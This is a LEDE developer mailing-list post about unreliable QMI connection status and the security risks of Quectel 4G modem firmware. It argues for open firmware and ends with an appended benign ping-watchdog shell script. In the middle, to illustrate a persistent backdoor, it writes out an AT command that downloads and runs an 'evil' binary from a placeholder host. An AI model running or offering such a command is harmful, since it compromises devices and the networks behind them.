[LEDE-DEV] Open and secure firmware for Quectel 4G modems [Was: Re: Quectel EC20 QMI autoconnect issues [Was: Re: [LEDE-DEV, 3/3, v3] uqmi: Prevent 'POLICY MISMATCH' error.]]

Petr Štetiar ynezz at true.cz
Sun Jan 8 11:26:23 PST 2017

Adding laforge and zecke to the Cc loop.

Matti Laakso <malaakso at elisanet.fi> [2017-01-08 14:39:34]:


> I'm almost done with checking the connection state using a proto_run_command
> with a simple script running uqmi --get-data-status periodically. If the
> check fails, the script dies and netifd should restart the connection. Then
> we hopefully don't need autoconnect anymore.

I'm not using the autoconnect feature anymore, I'm using a simple custom
script[1]. I wouldn't recommend using Qualcomm's implementation of QMI as the
source of truth about the connection status, I think it's more reliable to use
ping, wget/curl or some other more appropriate and battle-tested solution.

Simply said, uqmi can lie to you about the connection status. It's just some
qmuxd[2] after all, using a dozen threads answering you :-) What can probably go
wrong, right?

> > And I've seen "33C3: Dissecting modern (3G/4G) cellular modems", which makes
> > a lot of things crystal clear :-)
> That's an interesting talk, thanks for the note!

Indeed, it's very interesting and very scary. These modems are quite powerful
devices, usually equipped with a very good, but limited uplink connection, still
making them ideal candidates for a DDoS botnet for example, like any other router,
camera or IoT device. It's just a matter of time before we see something like this in
the wild.  The probability is very high, 1.5M lines of just kernel code done
probably in a hurry, without proper review, this is a very big attack surface.

It's better to not think about the system in the modem as a nice place for a
hideout for a very persistent backdoor to our systems, surviving even firmware
updates.  Just imagine some trojan inside the router running the following on the
modem's AT command serial interface:

   AT+QLINUXCMD=wget http://something/evil && ./evil

Guys at Osmocom already started working on completely open and more secure
firmware using OpenEmbedded, but I would like to see it supported in LEDE
also, probably with a more mainline kernel if possible. Still, it's quite
strange to see such big embedded systems running in the 4G modem. It seems
like 2017 is the era of SITSes, Systems In The Systems.

I use Quectel modems already, so I would love to work on this myself, but I've
a few other projects with higher priorities going on now, so I'm rather thinking
about another way of supporting this very promising project.

So far the best idea lying in my head currently is buying a few modems + mPCIe
breakout boards[3] and delivering those to interested developers. I'm just not
sure if this kind of support is going to lead somewhere.  Simply said, I'm
willing to spend some money in exchange for faster development of this project.

1. http://lists.infradead.org/pipermail/lede-dev/2016-October/003504.html
2. https://osmocom.org/projects/quectel-modems/wiki/Qmuxd
3. http://osmocom.org/projects/mpcie-breakout

-- ynezz
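
The reachability-based check suggested in the message above, as an added example that is not part of the original post or of LEDE's code: a watchdog that judges the link by an end-to-end probe and returns non-zero after several consecutive failures, so a script started with proto_run_command can die and let netifd restart the connection. The function names, the interface name wwan0, the probe target and the thresholds are all assumptions.

```shell
#!/bin/sh
# Added example: end-to-end reachability watchdog (hypothetical names throughout).

# probe_once IFACE HOST: one ICMP echo through the modem interface.
# Any other end-to-end check (wget, curl, DNS lookup) can replace it.
probe_once() {
    ping -c 1 -W 3 -I "$1" "$2" >/dev/null 2>&1
}

# watchdog PROBE_CMD MAX_FAILS INTERVAL [MAX_ROUNDS]
#   PROBE_CMD  command line whose exit status says whether traffic passes
#   MAX_FAILS  consecutive failed probes tolerated before giving up
#   INTERVAL   seconds to sleep between probes
#   MAX_ROUNDS stop after this many probes (0 = run forever)
# Returns 1 once MAX_FAILS probes in a row have failed, 0 if MAX_ROUNDS
# is reached first. A single successful probe resets the failure counter,
# so a short radio glitch does not tear the connection down.
watchdog() {
    probe_cmd=$1
    max_fails=$2
    interval=$3
    max_rounds=${4:-0}
    fails=0
    rounds=0
    while :; do
        if $probe_cmd; then
            fails=0
        else
            fails=$((fails + 1))
            if [ "$fails" -ge "$max_fails" ]; then
                return 1
            fi
        fi
        rounds=$((rounds + 1))
        if [ "$max_rounds" -gt 0 ] && [ "$rounds" -ge "$max_rounds" ]; then
            return 0
        fi
        if [ "$interval" -gt 0 ]; then
            sleep "$interval"
        fi
    done
}

# Intended use inside the script netifd supervises (placeholder target):
#   watchdog "probe_once wwan0 PROBE_TARGET" 3 30 || exit 1
```
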
